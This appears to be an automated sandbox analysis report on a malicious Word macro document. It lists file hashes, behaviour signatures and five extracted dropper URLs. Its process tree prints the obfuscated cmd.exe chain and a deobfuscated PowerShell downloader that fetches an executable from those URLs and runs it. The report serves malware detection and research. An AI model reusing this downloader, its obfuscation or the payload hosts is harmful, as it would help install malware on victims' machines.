Overview

overview

10

Static

static

8

63a518c1ac...18.doc

windows7-x64

10

63a518c1ac...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    21-05-2024 14:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    63a518c1acfaa38b3b7fb4603fcb6702_JaffaCakes118.doc

  • Size

    357KB

  • MD5

    63a518c1acfaa38b3b7fb4603fcb6702

  • SHA1

    8b84d41f94e21d322d68584be75fefc4c839b67d

  • SHA256

    7c698d56be5392b5c0735023c7fd1a9db1cc7e4e0e05d3c233db80af005b6c2d

  • SHA512

    a548fd848573e50b8fbadb6752d6456d410fae191dc10963d3762332d6853e980e25003ca734e13d57882ffaff0a3c4ed4491eca9135c5f1ec7afcf4f633e768

  • SSDEEP

    6144:PxjFSdDqxP1Ow5lKWyipxTK5YWofTLrrneNq52vOytu:NFSpsgw5sWyqA58/rDes0O6u

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://siamgemsheritage.com/backup3/wp-content/plugins/all-in-one-wp-migration/storage/uFb6zI7y
exe.dropper

http://stellandina.cl/gq8syuB5
exe.dropper

http://www.spor.advertisetr.com/nLIM
exe.dropper

http://fltstatus.com/y
exe.dropper

http://website.vtoc.vn/nhahanglamduong/wp-content/uploads/j

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

    execution
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\63a518c1acfaa38b3b7fb4603fcb6702_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2924
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ^fOR , /f , " delims=Pf tokens= 1 " ; ; %^c , in , ( , ; ' , ; F^^TyPe , , ^| ; ^^fInDstr , ^^md^^f ' , , ) , ; ^do ; ; %^c; , ; tTKEjwWa^/V^3*NW^ , 7KxSdM/R " ; , (sE^t _\^`=m-M^)^ k+7n^2,^G^oWt$^yIq^jis@=.u^ez:^FBafg0S}{8w/^;5L'VdRbcpD^(ClhPZr3xN^6^\J^vQ)&& , ; F^O^r ; %^v , iN ; ; ( ^ +50 +1^2 ; ^ 39 ^; ; ^ ^26 58 21^ ;^ 55 ^ 26 54 ^ ^+54^ 4 15 65 6^1 ^, ^ 45 23 ^ ^,^ 8 2^6 39^ 1 1^2 , ,^ ^4^8 19^ , ^, 26 ^ 49 ^14 4^ ^61 26 14 ^, 24 1^3^ +2^6 ^; 48^ 53 ^ +^54^ ; 20 26 ^+8 ^ 14 +4^1^ ; 15^ , ^ , 4^8 6^6 +4^3^ ^, , 23 4^4 5^5 +1^4 ; ^ 14 , ^ +50^ ; 28 ^ ^40 40^ ^ ^21 20^ , 31 0 +33 26 0 , , ^21 ^, , 55 +2^6^ ^ 58 ^20 ^14 , 31^ 33 ^ +26 +24 4^9^ 1^2 -0 ;^ 40 48 ^+31 49 5 +2^5 ; ; ^ 50 ; 59 ^, ,^ 40^ ; 3^9 50 ^ 1 ; ^ ; 49 +12 ^ 8 , ^ , 14 26 ^ ;^ ^8 14^ ^ 40 , ^, +5^0 +54 25^ ; 33 ^+2^0^ ^ 8^ 21 ^40 ; 31 54 54 1 ^ ^+20 ,^ ,^ 8 ; ^ +^1 1^2 +8 +26 , 1 39 , 50 ;^ ; 1 ^ ^0 ; ; 20 ^; 33 +^58 3^1^ ^14^ 20 12 , ^ ,^ +8 ^ 40 ^21 ^+^14 +12 5^8 31^ 33^ ^26 ^;^ 40^ 25 29 48 ^62 , ,^ 27 17 +7^ ^ 16 ^,^ ,^ 22 ^55^ 14 14 5^0 ^+^28 40 40 ^ ^+21 ^ , , 14 ^26 54 54 31 , ^ 8 46 ^+20 , , 8 +31^ ^ +24 +49 ^ +54 4^0 3^3^ +18 38^ 21^ 16 ^ ; ^ ;^ ^ 25 30 ;^ ; ^ +^42 +22 ;^ ^ ;^ 55 1^4 , 14 50 28^ 40^ ^40 , ,^ ^ 3^9 +39 ; 39 ^ , 24 +21 ^5^0^ 12 +58 24 31 46 6^5 , , +26^ 58 +14 ; ^20 21 , ^ ,^ 26 ^14 58 24 ^4^9 +1^2 ^ 0 40 +8 4^3 +17 , 2 ^22 ; ^ ; 55 , 14^ 14 ^; 5^0 28 40^ 40 ^+32 ; ^ ^;^ ^ ^+54 ; ; +14 21 , ^ 14 ^31 14^ +25 , , 21 24 ;^ ^ +49^ ^ ; 12 0 40^ 16 22 5^5 ^ ^14 ^ 14 50^ 28 , +^4^0 +^40 3^9 ^ , , +26 ^4^8 2^1^ ^20 14 26 2^4 , ^ +65 1^4 12 4^9 ; ; +^24 65^ 8^ ^ +40 ^ 8 55 31 ^55 31 +8 ^, , 33 ^ 54 3^1^ 0 ^ 4^6 25^ ^ ; ^; 12 ; +8 33 ^ ^40 39 50 ^ 1^ ^ ^49 ,^ , 12 +8 ; 1^4 2^6 8^ ^ ^14 ; ^; 40 +^25 ^ 50 54 , ,^ ^ 12 31 46 21 40 19 44 24 35 ^50^ ^ 54 20 ^14 52 ^ 44 22 , +^44 +3 4^1 1^5^ 39^ , ^ 39 , , ^64 ^ ^+4 23 4 +44 +^9 ^ 34 ^ 38 4^4 +^41 15 ^ ^;^ ^; +47 ^+11^ ^; ^ 57^ 23 ^ ^15 ^, ^, ^+^26 8 65 28 +1^4^ ^26 0^ +50 6 ^ 44^ , +63 44^ ; +6^ 15 39 +39 64 ;^ ^; ^6 44 ;^ ^ 24 ^26 ^60^ ; ; +26^ 44 ^ ^, 41 32 ^ +12 ^ 58^ ^26 31^ ^ 49 5^5 ; ; 52 ; ;^ ^ ^15 39 , ^ 46 , 45 ^ ,^ ^, +4 20 ^8 ^ ^ 4 ^ 15 48 6^6^ +^43 +3 +37 ; ^ 1^4^ 5^8 16 , 37 ^15 65 61 ^ ^45 +2^4 ^ 5^1^ , 1^2 ^39 ^ 8 54 12 3^1 ^ 4^6 29 +20 ; 54 26^ ^5^2 15 39 +46 45^ ^1^0 +4 , , 15 ; ; +^47 1^1^ 57 3 +41 35 14 +^3^1 58 +14 1 5^6^ , 58 ; ^; ^12 ^; +^49 26 21 21 4 15 ;^ 47^ ; 11 ^ 57 ^ ^4^1^ +^4^8^ +^58 2^6 ^; 31 5^ , , 41 36 +49 ^ 31 ^, ^14 ^ 49 ^; 5^5 ^+37 36 , , 36 ^+4 ^ ^ ^; 4 4 4 4 4 ; 4 4 ,^ 4^ +4 , ^, +4 ; ^ ^; ^4 ^ 4 +4 4^ 4^ ^+4 , 74 ^; ) ; ; ^dO (^SEt ^$`'=!^$`'!!_\^`:~ %^v, 1!)& ; ^if ; %^v ; e^Qu ; ; ^7^4 ; , ( (CaL^l , ; %^$`':*$`'!^=%) , ; , ; , ) "
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3428
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c F^TyPe | ^fInDstr ^md^f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3492
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" FTyPe "
          4⤵
            PID:3504
          • C:\Windows\SysWOW64\findstr.exe
            fInDstr mdf
            4⤵
              PID:3516
          • C:\Windows\SysWOW64\cmd.exe
            cmd ; , ; tTKEjwWa/V3*NW , 7KxSdM/R " ; , (sE^t _\^`=m-M^)^ k+7n^2,^G^oWt$^yIq^jis@=.u^ez:^FBafg0S}{8w/^;5L'VdRbcpD^(ClhPZr3xN^6^\J^vQ)&& , ; F^O^r ; %^v , iN ; ; ( ^ +50 +1^2 ; ^ 39 ^; ; ^ ^26 58 21^ ;^ 55 ^ 26 54 ^ ^+54^ 4 15 65 6^1 ^, ^ 45 23 ^ ^,^ 8 2^6 39^ 1 1^2 , ,^ ^4^8 19^ , ^, 26 ^ 49 ^14 4^ ^61 26 14 ^, 24 1^3^ +2^6 ^; 48^ 53 ^ +^54^ ; 20 26 ^+8 ^ 14 +4^1^ ; 15^ , ^ , 4^8 6^6 +4^3^ ^, , 23 4^4 5^5 +1^4 ; ^ 14 , ^ +50^ ; 28 ^ ^40 40^ ^ ^21 20^ , 31 0 +33 26 0 , , ^21 ^, , 55 +2^6^ ^ 58 ^20 ^14 , 31^ 33 ^ +26 +24 4^9^ 1^2 -0 ;^ 40 48 ^+31 49 5 +2^5 ; ; ^ 50 ; 59 ^, ,^ 40^ ; 3^9 50 ^ 1 ; ^ ; 49 +12 ^ 8 , ^ , 14 26 ^ ;^ ^8 14^ ^ 40 , ^, +5^0 +54 25^ ; 33 ^+2^0^ ^ 8^ 21 ^40 ; 31 54 54 1 ^ ^+20 ,^ ,^ 8 ; ^ +^1 1^2 +8 +26 , 1 39 , 50 ;^ ; 1 ^ ^0 ; ; 20 ^; 33 +^58 3^1^ ^14^ 20 12 , ^ ,^ +8 ^ 40 ^21 ^+^14 +12 5^8 31^ 33^ ^26 ^;^ 40^ 25 29 48 ^62 , ,^ 27 17 +7^ ^ 16 ^,^ ,^ 22 ^55^ 14 14 5^0 ^+^28 40 40 ^ ^+21 ^ , , 14 ^26 54 54 31 , ^ 8 46 ^+20 , , 8 +31^ ^ +24 +49 ^ +54 4^0 3^3^ +18 38^ 21^ 16 ^ ; ^ ;^ ^ 25 30 ;^ ; ^ +^42 +22 ;^ ^ ;^ 55 1^4 , 14 50 28^ 40^ ^40 , ,^ ^ 3^9 +39 ; 39 ^ , 24 +21 ^5^0^ 12 +58 24 31 46 6^5 , , +26^ 58 +14 ; ^20 21 , ^ ,^ 26 ^14 58 24 ^4^9 +1^2 ^ 0 40 +8 4^3 +17 , 2 ^22 ; ^ ; 55 , 14^ 14 ^; 5^0 28 40^ 40 ^+32 ; ^ ^;^ ^ ^+54 ; ; +14 21 , ^ 14 ^31 14^ +25 , , 21 24 ;^ ^ +49^ ^ ; 12 0 40^ 16 22 5^5 ^ ^14 ^ 14 50^ 28 , +^4^0 +^40 3^9 ^ , , +26 ^4^8 2^1^ ^20 14 26 2^4 , ^ +65 1^4 12 4^9 ; ; +^24 65^ 8^ ^ +40 ^ 8 55 31 ^55 31 +8 ^, , 33 ^ 54 3^1^ 0 ^ 4^6 25^ ^ ; ^; 12 ; +8 33 ^ ^40 39 50 ^ 1^ ^ ^49 ,^ , 12 +8 ; 1^4 2^6 8^ ^ ^14 ; ^; 40 +^25 ^ 50 54 , ,^ ^ 12 31 46 21 40 19 44 24 35 ^50^ ^ 54 20 ^14 52 ^ 44 22 , +^44 +3 4^1 1^5^ 39^ , ^ 39 , , ^64 ^ ^+4 23 4 +44 +^9 ^ 34 ^ 38 4^4 +^41 15 ^ ^;^ ^; +47 ^+11^ ^; ^ 57^ 23 ^ ^15 ^, ^, ^+^26 8 65 28 +1^4^ ^26 0^ +50 6 ^ 44^ , +63 44^ ; +6^ 15 39 +39 64 ;^ ^; ^6 44 ;^ ^ 24 ^26 ^60^ ; ; +26^ 44 ^ ^, 41 32 ^ +12 ^ 58^ ^26 31^ ^ 49 5^5 ; ; 52 ; ;^ ^ ^15 39 , ^ 46 , 45 ^ ,^ ^, +4 20 ^8 ^ ^ 4 ^ 15 48 6^6^ +^43 +3 +37 ; ^ 1^4^ 5^8 16 , 37 ^15 65 61 ^ ^45 +2^4 ^ 5^1^ , 1^2 ^39 ^ 8 54 12 3^1 ^ 4^6 29 +20 ; 54 26^ ^5^2 15 39 +46 45^ ^1^0 +4 , , 15 ; ; +^47 1^1^ 57 3 +41 35 14 +^3^1 58 +14 1 5^6^ , 58 ; ^; ^12 ^; +^49 26 21 21 4 15 ;^ 47^ ; 11 ^ 57 ^ ^4^1^ +^4^8^ +^58 2^6 ^; 31 5^ , , 41 36 +49 ^ 31 ^, ^14 ^ 49 ^; 5^5 ^+37 36 , , 36 ^+4 ^ ^ ^; 4 4 4 4 4 ; 4 4 ,^ 4^ +4 , ^, +4 ; ^ ^; ^4 ^ 4 +4 4^ 4^ ^+4 , 74 ^; ) ; ; ^dO (^SEt ^$`'=!^$`'!!_\^`:~ %^v, 1!)& ; ^if ; %^v ; e^Qu ; ; ^7^4 ; , ( (CaL^l , ; %^$`':*$`'!^=%) , ; , ; , ) "
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3528
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell $vNV=new-object Net.WebClient;$bQL='http://siamgemsheritage.com/backup3/wp-content/plugins/all-in-one-wp-migration/storage/uFb6zI7y@http://stellandina.cl/gq8syuB5@http://www.spor.advertisetr.com/nLIM@http://fltstatus.com/y@http://website.vtoc.vn/nhahanglamduong/wp-content/uploads/j'.Split('@');$wwJ = '208';$RGZ=$env:temp+'\'+$wwJ+'.exe';foreach($wdV in $bQL){try{$vNV.DownloadFile($wdV, $RGZ);Start-Process $RGZ;break;}catch{}}
              4⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3596
        • C:\Windows\splwow64.exe
          C:\Windows\splwow64.exe 12288
          2⤵
            PID:3880

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
          Filesize

          68KB

          MD5

          29f65ba8e88c063813cc50a4ea544e93

          SHA1

          05a7040d5c127e68c25d81cc51271ffb8bef3568

          SHA256

          1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

          SHA512

          e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\Tar2AA0.tmp
          Filesize

          177KB

          MD5

          435a9ac180383f9fa094131b173a2f7b

          SHA1

          76944ea657a9db94f9a4bef38f88c46ed4166983

          SHA256

          67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

          SHA512

          1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

          Download Submit

        • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
          Filesize

          20KB

          MD5

          30cabfc7d6e2b901456c5e606a73d6ce

          SHA1

          a220aba2c21f4a22d8820a98ef9c8aca07b7cdcd

          SHA256

          d211e212c81518de6becac91c8d0e17972eb6252645182cf377ea389bf627949

          SHA512

          a868fac2a5a0f42c08c33646692eb28682eaac6befe59e73ef581b924234626528c6537fb3ac8804045012c3155907edb1c3a37f0ddf17197d2afcbdc6dc33e8

          Download Submit

        • memory/2924-0-0x000000002F2E1000-0x000000002F2E2000-memory.dmp

          Filesize

          4KB

          Download

        • memory/2924-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

          Filesize

          64KB

          Download

        • memory/2924-2-0x000000007167D000-0x0000000071688000-memory.dmp

          Filesize

          44KB

          Download

        • memory/2924-5-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-6-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-7-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-8-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-9-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-10-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-36-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-11-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-13-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-12-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-15-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-16-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-17-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-19-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-18-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-20-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-21-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-22-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-23-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-24-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-25-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-26-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-27-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-28-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-29-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-30-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-31-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-32-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-33-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-34-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-47-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-48-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-46-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-45-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-44-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-43-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-42-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-41-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-40-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-39-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-38-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-37-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-35-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-565-0x000000007167D000-0x0000000071688000-memory.dmp

          Filesize

          44KB

          Download

        • memory/2924-566-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/2924-585-0x000000007167D000-0x0000000071688000-memory.dmp

          Filesize

          44KB

          Download

        • memory/2924-586-0x0000000000330000-0x0000000000430000-memory.dmp

          Filesize

          1024KB

          Download